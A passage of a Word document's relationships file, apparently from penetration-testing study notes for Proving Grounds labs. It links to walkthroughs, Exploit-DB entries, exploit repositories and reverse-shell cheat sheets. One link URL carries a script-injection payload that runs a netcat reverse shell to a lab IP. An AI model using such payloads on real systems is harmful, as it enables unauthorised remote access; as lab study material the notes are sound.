Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId1041" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/moneybox-walkthrough/" TargetMode="External"/><Relationship Id="rId1283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId691" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId1042" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId1284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://edbertsumicad.medium.com/pg-workaholic-privilege-escalation-via-misconfigured-plugin-loader-assume-breach-355a869b2efd" TargetMode="External"/><Relationship Id="rId690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/postfish" TargetMode="External"/><Relationship Id="rId1043" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image300.png"/><Relationship Id="rId1285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-roquefort-e61052190965" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image243.png"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_union.asp" TargetMode="External"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vaibhavc418/offensive-security-onsystemshelldredd-walkthrough-df7f44036f17" TargetMode="External"/><Relationship Id="rId1044" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image463.png"/><Relationship Id="rId1286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49383" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image256.png"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_union.asp" TargetMode="External"/><Relationship Id="rId696" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/pelican" TargetMode="External"/><Relationship Id="rId1045" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId1287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/12DXL3Nczy0m3E8wH0nIzTWTMNUeCWNXsjHCMxse9w3Q/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image454.png"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image201.png"/><Relationship Id="rId695" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-pelican-7021741caa2e" TargetMode="External"/><Relationship Id="rId1046" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId1288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://themcsam.github.io/posts/tarFs-PoC/" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image544.png"/><Relationship Id="rId452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-pelican-walkthrough-72190462e821" TargetMode="External"/><Relationship Id="rId1047" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" TargetMode="External"/><Relationship Id="rId1289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/52268" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/select-into.html" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/select-into.html" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image519.png"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image560.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image344.png"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image549.png"/><Relationship Id="rId1070" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@spAce0x/djinn-3-pg-play-write-up-dab19749c5e4" TargetMode="External"/><Relationship Id="rId1071" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ly4k/PwnKit" TargetMode="External"/><Relationship Id="rId1072" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image546.png"/><Relationship Id="rId484" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reddit.com/r/oscp/comments/190eesr/pebbles_proving_grounds_practice_without_sqlmap/" TargetMode="External"/><Relationship Id="rId1073" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@cyberarri/sunsetdecoy-pg-play-writeup-8728ae583dac" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/41239" TargetMode="External"/><Relationship Id="rId1074" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secybr.com/posts/snmp-pentesting-best-practicies/" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId482" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sudsy-fireplace-912.notion.site/Pebbles-from-Proving-Grounds-without-SQLMap-by-Luis-Moret-lainkusanagi-23b29df77e6946a6bb8cb213a76a9ac8" TargetMode="External"/><Relationship Id="rId1075" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html?highlight=snmp#1611621016110162udp---pentesting-snmp" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image334.png"/><Relationship Id="rId1076" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html?highlight=snmp#1611621016110162udp---pentesting-snmp" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.png"/><Relationship Id="rId488" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image520.png"/><Relationship Id="rId1077" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=3405s" TargetMode="External"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId1078" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image533.png"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15" TargetMode="External"/><Relationship Id="rId1079" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=1180s" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/offensive-security-walk-throughs/oscp-proving-grounds-walkthrough-pebbels-4598805db790" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.url-encode-decode.com/" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image451.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image468.png"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-hawat-3c4d2c388d7f" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image478.png"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bing0o.github.io/posts/pg-hawat/" TargetMode="External"/><Relationship Id="rId1060" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image547.png"/><Relationship Id="rId1061" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/nagoya-proving-grounds-practice-walkthrough-active-directory-bef41999b46f" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tjomk/wfuzz/blob/master/wordlist/fuzzdb/attack-payloads/sql-injection/exploit/mysql-injection-login-bypass.txt" TargetMode="External"/><Relationship Id="rId1062" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sumo-81-100-7de98134702" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId1063" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CptGibbon/CVE-2021-3156" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/pentesting-web/sql-injection/index.html?highlight=SQL%20inject#confirming-with-timing" TargetMode="External"/><Relationship Id="rId1064" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image434.png"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/cheat-sheet" TargetMode="External"/><Relationship Id="rId1065" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/snookums-proving-ground-practice-walkthrough-0a8937c6aa2f" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases/tag/v1.7.7" TargetMode="External"/><Relationship Id="rId477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bing0o.github.io/posts/pg-hawat/" TargetMode="External"/><Relationship Id="rId1066" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joeammond/CVE-2021-4034" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel/releases/tag/v1.7.7" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/cheat-sheet" TargetMode="External"/><Relationship Id="rId1067" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sybaris-491b23545014" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/blind#exploiting-blind-sql-injection-by-triggering-time-delays" TargetMode="External"/><Relationship Id="rId1068" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joeammond/CVE-2021-4034" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-cockpit-7e777892e485" TargetMode="External"/><Relationship Id="rId1069" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image432.png"/><Relationship Id="rId1015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId1257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rekter0/exploits/tree/master/VestaCP" TargetMode="External"/><Relationship Id="rId1016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/44340?source=post_page-----88a3e0e21f62---------------------------------------" TargetMode="External"/><Relationship Id="rId1258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rekter0/exploits.git" TargetMode="External"/><Relationship Id="rId1017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Ridter/redis-rce" TargetMode="External"/><Relationship Id="rId1259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rekter0/exploits.git" TargetMode="External"/><Relationship Id="rId1018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/snookums-proving-ground-practice-walkthrough-0a8937c6aa2f" TargetMode="External"/><Relationship Id="rId1019" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/linux-hardening/privilege-escalation" TargetMode="External"/><Relationship Id="rId668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image511.png"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md" TargetMode="External"/><Relationship Id="rId667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-61-proving-grounds-lavita-05d148d4fbfc" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation" TargetMode="External"/><Relationship Id="rId666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashes.com/en/tools/hash_identifier" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics" TargetMode="External"/><Relationship Id="rId669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://borgbackup.readthedocs.io/en/stable/usage/extract.html" TargetMode="External"/><Relationship Id="rId1250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50234" TargetMode="External"/><Relationship Id="rId1251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.png"/><Relationship Id="rId1010" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.png"/><Relationship Id="rId1252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image257.png"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image367.png"/><Relationship Id="rId664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId1011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-64-proving-grounds-30964bed6cf3" TargetMode="External"/><Relationship Id="rId1253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CSpanias/vesta-rce-exploit" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image268.png"/><Relationship Id="rId663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId1012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-64-proving-grounds-30964bed6cf3" TargetMode="External"/><Relationship Id="rId1254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image366.png"/><Relationship Id="rId1013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96" TargetMode="External"/><Relationship Id="rId1255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://192.168.239.156:8083" TargetMode="External"/><Relationship Id="rId661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image298.png"/><Relationship Id="rId1014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@yogasatriautama/pg-nukem-296392de8e96#bypass" TargetMode="External"/><Relationship Id="rId1256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ssd-disclosure.com/ssd-advisory-vestacp-lpe-vulnerabilities/" TargetMode="External"/><Relationship Id="rId1004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image380.png"/><Relationship Id="rId1246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oscp:20000" TargetMode="External"/><Relationship Id="rId1005" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image340.png"/><Relationship Id="rId1247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://oscp:20000" TargetMode="External"/><Relationship Id="rId1006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId1248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image245.png"/><Relationship Id="rId1007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sunsetmidnight-84-100-bc230e87baa2" TargetMode="External"/><Relationship Id="rId1249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image551.png"/><Relationship Id="rId1008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/sunset-midnight-walkthrough-proving-grounds-08ad53b2200a" TargetMode="External"/><Relationship Id="rId1009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image457.png"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/gaara-write-up-provinggrounds-vulnhub-0168a5beb32e" TargetMode="External"/><Relationship Id="rId657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image517.png"/><Relationship Id="rId899" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/dpkg" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image271.png"/><Relationship Id="rId656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-tre-92-100-9b73ef8d0918" TargetMode="External"/><Relationship Id="rId898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image401.png"/><Relationship Id="rId655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image228.png"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diego-treitos/linux-smart-enumeration" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50983" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/pc-proving-grounds-practice-walkthrough-7619983c7d63" TargetMode="External"/><Relationship Id="rId659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image364.png"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image250.png"/><Relationship Id="rId891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId890" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId1240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.117.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D" TargetMode="External"/><Relationship Id="rId1241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/IOActive/jdwp-shellifier" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image412.png"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId1000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3" TargetMode="External"/><Relationship Id="rId1242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image371.png"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image521.png"/><Relationship Id="rId652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/icmp-walkthrough-proving-grounds-92b43fa18823" TargetMode="External"/><Relationship Id="rId894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId1001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId1243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits" TargetMode="External"/><Relationship Id="rId651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackmd.io/@rudefish/offsec-pg-bbscute-easy" TargetMode="External"/><Relationship Id="rId893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId1002" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#URI_references" TargetMode="External"/><Relationship Id="rId1244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image336.png"/><Relationship Id="rId650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId1003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Uniform_Resource_Identifier#URI_references" TargetMode="External"/><Relationship Id="rId1245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image267.png"/><Relationship Id="rId1037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b" TargetMode="External"/><Relationship Id="rId1279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-extplorer-proving-ground-practice-a9efaa755f6d" TargetMode="External"/><Relationship Id="rId1038" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mr-tuhin/CVE-2021-22204-exiftool" TargetMode="External"/><Relationship Id="rId1039" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@danielndias/pg-practice-exfiltrated-4bd4e9b5bc2b" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image206.png"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 